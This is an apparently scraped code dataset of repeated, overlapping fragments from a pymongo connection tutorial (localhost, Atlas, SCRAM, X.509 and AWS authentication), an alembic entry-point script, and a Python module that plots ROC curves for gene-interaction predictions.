MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/')", "MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate", "'pip install pymongo' import urllib from pymongo import MongoClient client = MongoClient() #", "client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and", "to localhost : # Format : # client = MongoClient('<host>', port_number) client =", "IAM credentials # The access_key_id and secret_access_key passed into the URI MUST be", "the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True,", "= MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the", "port_number) client = MongoClient('localhost', 27017) # or use the entire URL # client", "AWS Connections # Authenticate using AWS IAM credentials # The access_key_id and secret_access_key", "entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI", "# Here authSource overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256", "derived from the # distinguished subject name of the X.509 certificate presented by", "pymongo using 'pip install pymongo' import urllib from pymongo import MongoClient client =", "SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate", "by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\",", "Connect via URI : # Use pip3 install pymongo[tls] for connecting to atlas", "= MongoClient() # Connect to localhost : # Format : # client =", "default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password',", "or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') #", "# client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username", "# Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client =", "access_key_id and secret_access_key passed into the URI MUST be percent escaped. client =", "client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install pymongo[tls]", "which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') #", "# client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the", "# Use pip3 install pymongo[tls] for connecting to atlas # Format : #", "a username derived from the # distinguished subject name of the X.509 certificate", "MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the entire URL #", "and secret_access_key passed into the URI MUST be percent escaped. client = MongoClient(", "password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption #", "from pymongo import MongoClient client = MongoClient() # Connect to localhost : #", "pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username", "(urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default database name", "is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL", "# SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with", "with certificate validation # The MONGODB-X509 mechanism authenticates a username derived from the", "X.509 certificate presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509", "# AWS Connections # Authenticate using AWS IAM credentials # The access_key_id and", "URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") # Check status print(client.stats)", "client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the entire", "27017) # or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client =", "string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\"", "install pymongo' import urllib from pymongo import MongoClient client = MongoClient() # Connect", "Use pip3 install pymongo[tls] for connecting to atlas # Format : # client", ": # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping", "MongoClient() # Connect to localhost : # Format : # client = MongoClient('<host>',", "authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates a", "# TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates a username", "MONGODB-X509 mechanism authenticates a username derived from the # distinguished subject name of", "mechanism authenticates a username derived from the # distinguished subject name of the", "# Connect to localhost : # Format : # client = MongoClient('<host>', port_number)", ": # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use", "# Connect via URI : # Use pip3 install pymongo[tls] for connecting to", "# Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) #" ]
[ "import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10', 'console_scripts',", "__requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ == '__main__':", "'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10',", "from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10', 'console_scripts', 'alembic')() )", "<filename>myenv/Scripts/alembic-script.py #!e:\\python\\szuprojects\\flasky\\myenv\\scripts\\python3.exe # EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import", "# EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if", "EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__", "#!e:\\python\\szuprojects\\flasky\\myenv\\scripts\\python3.exe # EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point", "'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ ==", "sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10', 'console_scripts', 'alembic')()", "= 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit(" ]
[ "gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in", "= index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ):", "method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True)", "value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if", "| _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index for index", "show it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method])", "name to include AUC to show it in legend if auc_dict_list: for method", "reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold =", "= sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) / 2", "a df with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel =", "a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True", "int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) )", "area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with", "xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy", "in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return", "mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title", "auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods plot a", "y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy,", "number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist()", "in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index,", "predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) |", "return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe", "set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [", "as pd import numpy as np import matplotlib.pyplot as plt import seaborn as", "predicted_interactions.e2 ] for gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity,", "# print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0:", "pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy,", "from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\")", "labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in", "= true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions)))", "index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions", "include AUC to show it in legend if auc_dict_list: for method in auc_dict_list.keys():", "print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx,", "np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = (", "to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='',", "plot a ROC curve.\"\"\" labels = { gene for genes in [ true_interactions.e1,", "xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve", "seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n *", "= reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points *", "\"\"\"Return dataframe that can be used to plot a ROC curve.\"\"\" labels =", "title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True )", "data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel)", "curve.\"\"\" labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2", "true_interactions.intensity, predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if", "roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ),", "mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method']", "ROC.\"\"\" import pandas as pd import numpy as np import matplotlib.pyplot as plt", "matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import roc_curve, auc #", "yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve =", "reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name],", "it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices", "index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions", "true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values,", "Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic' #", "np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ):", "predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores = _get_evaluation_on_given_labels(", "sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1)", "* [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df(", "plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel =", "in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] = mean_auc", "avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway',", "_check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2", "scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can", "sum(y) > 0: xx, yy, threshold = roc_curve(y, scores) print(method_name, y, scores, threshold,", "def _get_total_undirected_interactions(n): return n * (n - 1) / 2 def _check_index(index, labels_set,", "df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT' else method", "interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set)", "e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([", "seaborn as sns from sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\")", "sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) / 2 def _check_index(index,", "), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None,", "0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points", "import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import roc_curve, auc", "true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels)", "yy) else: yy = reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({", "unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if output_filepath: plt.savefig(output_filepath,", "'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df,", "!= 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method')", "interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions,", "sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n -", "6) ): \"\"\"From a df with multiple methods plot a roc curve using", "predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100", "import pandas as pd import numpy as np import matplotlib.pyplot as plt import", "curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate'", "= set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ])", "interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node", "): \"\"\"From a df with multiple methods plot a roc curve using sns.tspot.\"\"\"", "''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df,", "yy = reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points", "sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel)", "_filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for", "= _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) )", "sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate' title =", "a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions,", ") ) if no_self_loops: interaction_indices = [ index for index in interaction_indices if", "] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions =", "'False Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic'", "in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity ) # print(method_name,", "print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx,", "in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y,", "+ 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to", "}) return roc_df, area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From", "= np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def", "* [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() })", "be used to plot a ROC curve.\"\"\" labels = { gene for genes", "pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def _is_index_diagonal(index,", "df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot(", "auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return", "in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices =", "# rename method name to include AUC to show it in legend if", "== method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if", "df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method !=", "to plot a ROC curve.\"\"\" labels = { gene for genes in [", "_get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set(", "if not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices", "Rate' ylabel = 'True Positive Rate' title = 'Receiver Operating Characteristic' # rename", "dataframe that can be used to plot a ROC curve.\"\"\" labels = {", "= df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format(", "'.format( method.capitalize() if method != 'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc", "number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot a ROC curve.\"\"\"", "def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1 in labels_set and", "genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes }", "for gene in genes } y, scores = _get_evaluation_on_given_labels( labels, true_interactions.intensity, predicted_interactions.intensity )", "= list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices", "= np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold = roc_curve(y,", "zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values,", "used to plot a ROC curve.\"\"\" labels = { gene for genes in", "as np import matplotlib.pyplot as plt import seaborn as sns from sklearn.metrics import", "another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True", "= mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT'", "xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate' title = 'Receiver", "condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if output_filepath:", "'method'] = ( '{} '.format( method.capitalize() if method != 'INtERAcT' else method )", "interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in", "[ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in genes } y, scores", "another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices =", "multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate'", "interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops:", "color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) /", "predicted_interactions.intensity ) # print(method_name, y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y)", ").fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append(", "else: yy = reference_xx area_under_curve = 0.5 # worst roc_df = pd.DataFrame({ 'pathway':", "ROC curve.\"\"\" labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2,", "inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid': False}) sns.tsplot( data=df, time='XX',", "df with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel = 'False", "to build ROC.\"\"\" import pandas as pd import numpy as np import matplotlib.pyplot", "true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot a", "plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods", "predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices)", "df['method'] == method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize()", "= df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend title plt.figure(figsize=figsize) sns.set_style(\"whitegrid\", {'axes.grid':", "yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5", "len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y,", "method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used to plot", "to include AUC to show it in legend if auc_dict_list: for method in", "= 0.5 # worst roc_df = pd.DataFrame({ 'pathway': number_of_roc_points * [pathway_name], 'method': (", "_filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index for index in", "= [ index for index in interaction_indices if not _is_index_diagonal(index) ] predicted_interactions =", ") if no_self_loops: interaction_indices = [ index for index in interaction_indices if not", "= 'True Positive Rate' title = 'Receiver Operating Characteristic' # rename method name", "method df['mean_auc'] = mean_auc df.loc[method_indices, 'method'] = ( '{} '.format( method.capitalize() if method", "settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n", "labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set,", "roc_curve(y, scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy", "sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) / 2 def", "= ( '{} '.format( method.capitalize() if method != 'INtERAcT' else method ) +", "= pd.Series([ _check_index(index, labels_set, interaction_symbol) for index in indexes ]) return indexes[filtering] def", "else method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''},", "{'axes.grid': False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0,", "number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist() }) return roc_df, area_under_curve def", "true_interactions.reindex( interaction_indices ).fillna(0.0) zero_interactions = int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores", "'INtERAcT' else method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method':", "y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx,", "e2 = index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes,", "def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels(", "return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set", "sklearn.metrics import roc_curve, auc # seaborn settings sns.set_style(\"white\") sns.set_context(\"paper\") color_palette = sns.color_palette(\"colorblind\") sns.set_palette(color_palette)", "indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node == another_node def", "not _is_index_diagonal(index) ] predicted_interactions = predicted_interactions.reindex( interaction_indices ).fillna(0.0) true_interactions = true_interactions.reindex( interaction_indices ).fillna(0.0)", "a ROC curve.\"\"\" labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1,", "= index.split(interaction_symbol) return (e1 in labels_set and e2 in labels_set) def _filter_indices_with_labels(indexes, labels,", "labels = { gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ]", "False}) sns.tsplot( data=df, time='XX', value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1])", "]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return a_node ==", "get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe that can be used", "scores) print(method_name, y, scores, threshold, xx, yy) area_under_curve = auc(xx, yy) yy =", "method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method]) method_indices = df['method'] == method df['mean_auc'] =", "np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve = 0.5 # worst roc_df", "using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True Positive Rate' title", "scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) ) return y, scores def get_roc_df( pathway_name, method_name,", ") return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return", "== another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices", "1) / 2 def _check_index(index, labels_set, interaction_symbol='<->'): e1, e2 = index.split(interaction_symbol) return (e1", "pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn", "labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index, labels_set, interaction_symbol) for index", "auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy = reference_xx area_under_curve =", "'pathway': number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 